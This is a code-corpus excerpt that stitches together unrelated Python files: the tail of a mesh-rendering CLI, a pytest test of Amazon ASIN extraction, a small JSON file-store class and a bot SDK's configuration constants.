parser.add_argument('-i', '--input', dest='input', type=str, action='store', required=True,
help='Input mesh ply file')
parser.add_argument('-o', '--output', dest='output', type=str, action='store', required=True,
help='Output rendered png file')
args = parser.parse_args()
if not configure(args):
exit(0)
filename = os.path.realpath(args.input)
tmp_out_file = os.path.splitext(filename)[0]+'_temp_rgba_float.ply'
vertices = cvt_rgba2float(filename, tmp_out_file)
mts_render(tmp_out_file, vertices, args.output)
| 2.078125 | 2 |
tests/test_tools.py | frenners/python-amazon-paapi | 121 | 12765148 | <filename>tests/test_tools.py
from amazon_paapi.exceptions import AsinNotFoundException
from amazon_paapi.tools import get_asin
import pytest
def test_get_asin():
assert get_asin('B01N5IB20Q') == 'B01N5IB20Q'
assert get_asin('https://www.amazon.es/gp/product/B07PHPXHQS') == 'B07PHPXHQS'
assert get_asin('https://www.amazon.es/gp/product/B07PHPXHQS?pf_rd_r=3FXDZDV1W6KY83KEE2Z4&pf_rd_p=c6fa5af0-ec7c-40de-8332-fd1421de4244&pd_rd_r=58786171-de0f-4fe1-a2df-ee335d6715ee&pd_rd_w=KND7A&pd_rd_wg=kIr5z&ref_=pd_gw_unk') == 'B07PHPXHQS'
assert get_asin('https://www.amazon.es/dp/B07PKW4CKF') == 'B07PKW4CKF'
assert get_asin('https://www.amazon.es/dp/B07PKW4CKF?_encoding=UTF8&ref_=pocs_dp_m_sp_multi_c_more_nooffers_B08D1G2XVX') == 'B07PKW4CKF'
with pytest.raises(AsinNotFoundException):
get_asin('https://www.amazon.es/gp/')
with pytest.raises(AsinNotFoundException):
get_asin('this is not even a URL')
| 2.25 | 2 |
src/core/database/database.py | Bizarious/mra-discord | 0 | 12765149 | import os
import json
from typing import Union
class DataBasic:
path = ""
def first_startup(self):
if not os.path.exists(self.path):
os.mkdir(self.path)
print(f"created {self.path} directory")
class Data(DataBasic):
path = "./data"
def __init__(self):
self._buffer = {}
self.first_startup()
@property
def buffer(self):
return self._buffer
@staticmethod
def check_path(path: str):
if not os.path.exists(path):
os.mkdir(path)
print(f"Created {path}")
@staticmethod
def check_file(file: str, path: str):
if not os.path.exists(f"{path}/{file}"):
f = open(f"{path}/{file}", "w")
if file.endswith(".json"):
json.dump({}, f)
f.close()
def _load_file(self, *, file: str, path: str = ""):
path = f"{self.path}/{path}"
self.check_path(path)
self.check_file(file, path)
return open(f"{path}/{file}")
def get(self, *, file, path: str = "", buffer: bool = True) -> str:
if file not in self._buffer.keys():
f = self._load_file(file=file, path=path)
content = f.read()
if buffer:
self._buffer[file] = content
return content
else:
return self._buffer[file]
def get_json(self, *, file, path: str = "", buffer: bool = True) -> Union[list, dict]:
if file not in self._buffer.keys():
f = self._load_file(file=file + ".json", path=path)
content = json.load(f)
if buffer:
self._buffer[file] = content
return content
else:
return self._buffer[file]
def _save_file(self, *, data, file: str, path: str = ""):
path = f"{self.path}/{path}"
self.check_path(path)
f = open(f"{path}/{file}", "w")
if file.endswith(".json"):
json.dump(data, f)
else:
f.write(data)
f.close()
def set(self, *, file, path: str = "", data, buffer: bool = True):
if buffer:
self._buffer[file] = data
self._save_file(data=data, file=file, path=path)
def set_json(self, *, file, path: str = "", data, buffer: bool = True):
if buffer:
self._buffer[file] = data
self._save_file(data=data, file=file + ".json", path=path)
if __name__ == "__main__":
d = Data()
d.get_json(file="test", path="testing")
| 3.0625 | 3 |
simplepybotsdk/configurations.py | vellons/SimplePYBotSDK | 11 | 12765150 | VERSION = "0.7.0"
LICENSE = "MIT - Copyright (c) 2021 <NAME>"
MOTORS_CHECK_PER_SECOND = 20
MOTORS_POINT_TO_POINT_CHECK_PER_SECOND = 10
WEB_SOCKET_SEND_PER_SECOND = 10
SOCKET_SEND_PER_SECOND = 20
SOCKET_INCOMING_LIMIT = 5
SLEEP_AVOID_CPU_WASTE = 0.80
| 0.902344 | 1 |